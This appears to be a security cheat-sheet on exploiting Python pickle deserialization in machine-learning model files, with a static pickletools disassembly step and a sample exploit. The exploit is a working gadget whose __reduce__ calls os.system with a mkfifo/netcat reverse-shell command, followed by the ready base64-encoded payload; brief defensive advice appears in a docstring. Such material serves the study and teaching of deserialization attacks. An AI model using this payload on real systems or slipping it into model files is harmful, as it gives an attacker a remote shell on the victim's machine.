Python Deserialization

Exploiting machine-learning model files that are serialized with pickle. Loading such a file is code execution, not data parsing: the unpickler will call any importable callable the stream names.

Pickle

Pickling Format

Disassemble a pickle file (static inspection — the opcodes are listed, not executed):

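# Static disassembly of a pickle. pickletools.dis only walks the opcode stream;
# it never resolves GLOBAL/STACK_GLOBAL references or calls REDUCE, so unlike
# pickle.load it is safe to run on an untrusted file. Add -a to annotate opcodes.
python -m pickletools model.pickle   # replace model.pickle with the file under analysis

# Example output (byte offset, opcode byte, mnemonic, argument). Look for
# GLOBAL / STACK_GLOBAL naming os.system, posix.system, subprocess.*, builtins.eval
# etc., followed by REDUCE — that is the execution gadget.
#   0: \x80 PROTO      3
#   2: ]    EMPTY_LIST
#   3: q    BINPUT     0
#   5: (    MARK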

Sample Exploit:

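import base64
import os
import pickle
# _pickle is the C accelerator behind the pickle module in Python 3; the
# ``cPickle`` name is Python 2 legacy. Both emit byte-identical payloads here.
import _pickle as cPickle


class RCE(object):
    """Pickle gadget: unpickling an instance runs a reverse-shell command.

    On the *producing* side pickle honours ``__reduce__``: the returned
    ``(callable, args)`` pair is written into the stream as a global
    reference to ``os.system`` (serialized as ``posix.system``) followed by
    a REDUCE opcode. On the *consuming* side ``pickle.loads`` resolves that
    reference through ``Unpickler.find_class`` and calls it, so the command
    runs before any object is handed back to the caller. Nothing is executed
    while the payload is being built.

    Defence: never ``pickle.load`` bytes from an untrusted source. If you
    must, subclass ``pickle.Unpickler`` and override ``find_class`` with a
    strict allow-list, or store the data in a format that cannot name code.
    """

    def __reduce__(self):
        """Return ``(os.system, (cmd,))`` so the unpickler calls os.system(cmd).

        The original ``eval('os.system')`` indirection resolved to the very
        same function object; referencing it directly yields an identical
        pickle and avoids a needless eval.
        """
        # Reverse shell to 127.0.0.1:1234 via a named pipe (lab address; adjust).
        cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f'
        return (os.system, (cmd,))


if __name__ == '__main__':
    # Building and encoding the payload never runs cmd; only pickle.loads()
    # on the victim does.
    # NOTE: the literal outputs below were captured with pickle protocol 4
    # (the default on Python 3.8-3.13). A different default protocol changes
    # only the leading header bytes (first base64 characters), not the gadget.

    # Pickle exploit
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
    # b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='

    # cPickle (_pickle) exploit — same bytes as above
    cpickled = cPickle.dumps(RCE())
    print(base64.urlsafe_b64encode(cpickled))
    # b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='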